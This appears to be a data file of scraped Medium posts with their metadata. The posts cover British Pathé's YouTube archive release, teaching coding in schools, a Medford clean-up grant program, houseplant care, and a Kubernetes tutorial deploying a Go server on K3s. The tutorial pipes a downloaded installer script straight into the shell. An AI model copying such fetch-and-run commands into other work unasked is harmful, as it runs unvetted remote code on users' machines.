Newsreel archive British Pathé has uploaded its entire collection of 85,000 historic films, in high resolution, to its YouTube channel. This unprecedented release of vintage news reports and cinemagazines is part of a drive to make the archive more accessible to viewers all over the world. “Our hope is that everyone, everywhere who has a computer will see these films and enjoy them,” says Alastair White, General Manager of British Pathé. “This archive is a treasure trove unrivalled in historical and cultural significance that should never be forgotten. Uploading the films to YouTube seemed like the best way to make sure of that.”
The above is fantastic news for sites like ours and the Woking Muslim Mission website as we can finally watch and share, at no cost, stunning videos from when the Lahore Ahmadiyya Movement ran the Woking Mosque in the UK.
Further videos can be seen here.
Original Source: British Pathe
|
https://medium.com/virtual-mosque/british-path%C3%A9-releases-85-000-films-on-youtube-5f0c9ceb878e
|
['Virtual Mosque']
|
2016-04-09 17:56:23.440000+00:00
|
['Ahmadiyya', 'Lahore', 'British']
|
Coding Should be Taught in Schools as a Unique Subject. Here’s Why.
|
Seantarzy · Dec 18
Computer science is an undeniable, omnipresent part of our lives, and there is no sign of it going away anytime soon. With such great demand for software engineers and data scientists, many schools see it fit to teach computer programming, even as early as elementary school. Schools that have implemented such programs are ahead of the curve and are appropriately shaping the next generation. However, there is one issue with regard to the manner in which schools are implementing technology education. Some schools are teaching computer programming within the framework of math classes, or even teaching it as a language. The problem is that coding falls under neither of these categories, and it should be treated as its own unique discipline.
Only a few days ago, neuroscientists at MIT published findings on the effects that computer programming has on the brain. They attempted to address a common coding conundrum: is it a kind of math? A language? Both?
In the course of their research, the neuroscientists found that reasoning through computer code activates a totally different region of the brain than the one activated by language-learning. Coding activates the “multiple demand network”, which is reserved for complex cognitive functions, such as math problems.
So now you may be thinking: “Oh ok, so it is a form of mathematics.” Well, while math also activates the multiple demand network, math and computer programming activate different parts of that network. So, coding does not exactly cognitively translate to math. A brilliant mathematician will not necessarily be a proficient coder, and vice versa.
The implications of such unique brain activity are rather exciting. We now have the chance to evolve our brains. While math and reading have been pillars of traditional education for thousands of years, computer programming is a new human activity. Therefore, exercising the “coding muscles” of the brain can bring us new ways of thinking to advance society. Senior author of the paper Evelina Fedorenko states, “It’s possible that if you take people who are professional programmers, who have spent 30 or 40 years coding in a particular language, you may start seeing some specialization, or some crystallization of parts of the multiple demand system.”
Even with this finding, the researchers still ask the question, “Does computer programming fall under the category of math or language?” Sometimes the best way to answer a question is to remove the parameters presented. It’s neither. Not only is that a solid answer to the proposed question, but it also can have very progressive ramifications for generations to come. The world is full of problems. Let’s give the young generation the opportunity to approach these problems with a fresh mindset by creating a new, exciting school subject. A subject that is not only sure to increase in relevance, but, because of its uniqueness, is likely to augment student minds and challenge traditional thought.
Sources:
|
https://medium.com/swlh/coding-should-be-taught-as-in-schools-as-a-unique-subject-heres-why-bf242803cb2e
|
[]
|
2020-12-19 09:57:39.136000+00:00
|
['Technology', 'Education', 'Programming', 'MIT']
|
Medford looking for nonprofit involvement in Clean Communities Grant Program
|
With the return of the spring season, Medford Township is looking for non-profit organizations to help clean up township properties through its Clean Communities Grant Program.
Headed by Judy Scherf, the township’s recycling coordinator, the grant program gives money to non-profits in return for volunteering to clean up the township’s parks, streets and other properties. The grant money also pays for cleaning supplies and equipment.
“The funding comes from the state to the township,” Scherf said. “It’s for cleaning the town. I have non-profit adult groups, and I have Boy and Girl Scout groups as well.”
The state’s Clean Communities funding can only be applied toward cleaning township properties. The township’s Neighborhood Services Advisory Committee identifies a number of cleaning projects varying from parks to streets and assigns them to different non-profits.
“We usually do the parks, like Bob Meyer Park, Freedom Park, Bende Park,” Scherf said. “That’s what the Boy and Girl Scout groups usually do. I recently had Jones Road done and Gravely Road done. Our adult groups go out on the roads.”
To receive the money from the state, the township files a report detailing the projects and the organizations working on them. Scherf said the funding varies from year-to-year depending on the number and scope of the projects.
“(The state) takes that grant and looks at how much work we did, what we worked on and how many supplies I bought,” Scherf said. “Some years, we haven’t been able to do a lot, and there are others years where we’ve had a lot going on.”
Even though the grant money is only awarded for cleaning projects, the program has had a residual effect on the community. Scherf said many of the participating non-profits return to their project sites for further beautification and restoration on their own time.
“We give them a donation from the program,” she said. “Afterward, they can do what they want with beautifying it.”
One such example in recent years was a cleaning project at the municipal building on Main Street. Following the Clean Communities project, groups returned to plant flowers and further beautify the property.
Another positive of the program has been its facilitation of a community service attitude among youth organizations.
“The kids are learning so much from it,” she said.
The Clean Communities program is something the township is pushing as the weather warms up and residents partake in more outdoor activities.
Councilman Randy Pace took a few minutes to inform the public about it at last week’s council meeting in hopes to get more organizations involved this year.
“Right now, we have about 10 to 12 non-profits involved,” he said.
Scherf said the township is open to inviting new non-profits to get involved with the program. She emphasized businesses are not permitted to participate.
For more information on Clean Communities or to get involved, contact Scherf at (609) 654–6791 ext. 322 or email [email protected].
|
https://medium.com/the-medford-sun/medford-looking-for-nonprofit-involvement-in-clean-communities-grant-program-26300b64d884
|
[]
|
2016-12-19 15:34:38.693000+00:00
|
['Families', 'Headlines', 'Cleaning', 'Medford', 'Nonprofits']
|
caring for plants
|
i just actually can not care for my house plants guys. I swear i try really hard to keep them alive but they just keep dying. chinese money plant? dead. my succulents? dead. the rest of my plants? really very droopy and on the brink of death. idk if anyone has any tips maybe that would work. OR maybe i should look up what the easiest plants to take care of are. yea. probably succulents (which died) but maybe if i buy more they wont die this time.
|
https://medium.com/@hannahokay/caring-for-plants-396200ea9466
|
[]
|
2020-12-18 05:43:17.352000+00:00
|
['Plants', 'Clairo', 'Teens', 'Houseplants']
|
Zero to Kubernetes in 5 Mins
|
K8s in practice
Now that we have a good understanding of what Kubernetes is, let’s see it in practice.
In this tutorial, we will:
Create a simple http server with golang
Deploy a k8s cluster, we will use K3s (a lightweight Kubernetes distribution)
Deploy our golang server on top of K8s
Expose our server to the outer world to be able to access it over the internet.
Prerequisites:
Linux-based machine (Ubuntu or CentOS). For Windows you can use Minikube or Kind instead of K3s, and almost everything else should remain the same.
Docker
Golang (this tutorial assumes version 1.15.3 but older versions should work as well)
A docker registry account (you can create an account for free on dockerhub)
Now let’s get our hands dirty!
1. Install golang following the steps mentioned here. Then create a folder in any location of your choice. In this tutorial I will be using the following path as the root folder of my project: /root/tutorial
2. Create a simple http go server. Use the following file and save it in /root/tutorial under any name. I will refer to it as server.go
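The server.go gist embedded in the original post did not survive extraction. Below is a minimal sketch of what it might contain, assuming a single handler listening on port 8080; the greeting text and function names are assumptions, not the author's original code.

```go
package main

import (
	"fmt"
	"net/http"
)

// greeting returns the response body. It is kept as a plain function
// so the behavior is easy to test in isolation.
func greeting() string {
	return "Hello from the tutorial server!"
}

// helloHandler writes the greeting for every incoming request.
func helloHandler(w http.ResponseWriter, r *http.Request) {
	fmt.Fprint(w, greeting())
}

func main() {
	http.HandleFunc("/", helloHandler)
	// This matches the startup message referenced in the next step.
	fmt.Println("Starting server at port 8080")
	if err := http.ListenAndServe(":8080", nil); err != nil {
		panic(err)
	}
}
```

Running `go run server.go` with a file like this prints the startup message the next step checks for.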
3. Make sure everything is set up and the file runs correctly by running the command $ go run server.go . You should see “Starting server at port 8080”.
4. Next step is to build our go project into an executable. Run the following command at the root directory of the project (where server.go lives):
$ GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build .
You should see a newly created executable file with no extension.
5. To complete the next steps we’ll need to create a dockerhub account; you can sign up for free. We will need an account on dockerhub or any other registry to push the docker image that we will create.
6. Then we need to containerize our server. First we will need to install docker. After installing docker successfully, we can build a docker image for our server. To do that, copy the following gist into a file named Dockerfile inside /root/tutorial
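The Dockerfile gist is also missing from the extracted post. A minimal sketch of what it might contain, assuming the statically linked binary produced by the `CGO_ENABLED=0` build in step 4 is named `tutorial` (the binary name is an assumption based on the project directory):

```dockerfile
# Statically linked Go binary, so an empty base image is enough.
FROM scratch
COPY tutorial /tutorial
# The server listens on 8080, matching server.go.
EXPOSE 8080
ENTRYPOINT ["/tutorial"]
```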
Afterwards run the following command
$ docker build . -t <dockerhub-username>/tutorial where you should replace <dockerhub-username> with your username on dockerhub.
7. Login using docker cli command $ docker login -u <dockerhub-username> Then push the created image to dockerhub $ docker push <dockerhub-username>/tutorial
8. Now that our docker image is ready, we can use K8s to deploy and manage container(s) from that image for us. To do that, let’s install K3s first. I am using K3s for this tutorial as I find it a reliable and lightweight distribution of K8s, perfect for development and edge (environments with limited resources) deployments. To install it you just need to run $ curl -sfL https://get.k3s.io | sh - That’s it! That is all you need to do in order to have a functional Kubernetes cluster.
9. Next we want to create a k8s deployment file for our image. Copy and paste the following yaml deployment file on your machine.
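The deployment manifest gist did not survive extraction either. A minimal sketch of `tutorial-deployment.yaml`, consistent with the deployment name (`go-server-deployment`), the image built earlier, and the expose command used below; the label names are assumptions:

```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: go-server-deployment
spec:
  replicas: 1
  selector:
    matchLabels:
      app: go-server
  template:
    metadata:
      labels:
        app: go-server
    spec:
      containers:
        - name: go-server
          # Replace <dockerhub-username> with your dockerhub username.
          image: <dockerhub-username>/tutorial
          ports:
            - containerPort: 8080
```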
10. Now we want to instruct k8s to create that deployment for us. To do that we need to run $ kubectl create -f tutorial-deployment.yaml To validate the deployment was created successfully, we should run $ kubectl get pods and we should be able to see something similar to
NAME READY STATUS RESTARTS AGE
go-server-deployment-xxxx 1/1 Running 0 65m
11. We are almost there, we have everything set by now and K8s is currently managing our container for us. The only missing step is to expose our pod to the outer world in order to be able to access it over the internet. To achieve that we just need to run the following command
$ kubectl expose deployment go-server-deployment --type=NodePort
This command will expose our deployment to the outer world on a random port. To identify that random port, we need to run $ kubectl get svc . We should be able to see a service that got created for us:
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP x.x.x.x <none> 443/TCP 87m
go-xxx NodePort x.x.x.x <none> 8080:31628/TCP 37m

Here the service maps container port 8080 to node port 31628, so the server can now be reached from outside the cluster at http://<node-ip>:31628/ .
|
https://medium.com/swlh/zero-to-kubernetes-in-5-mins-dcff81b4508
|
['Ahmed Nader']
|
2020-10-27 06:17:42.173000+00:00
|
['Golang', 'Cloud Native', 'Kubernetes', 'Tutorial', 'Docker']
|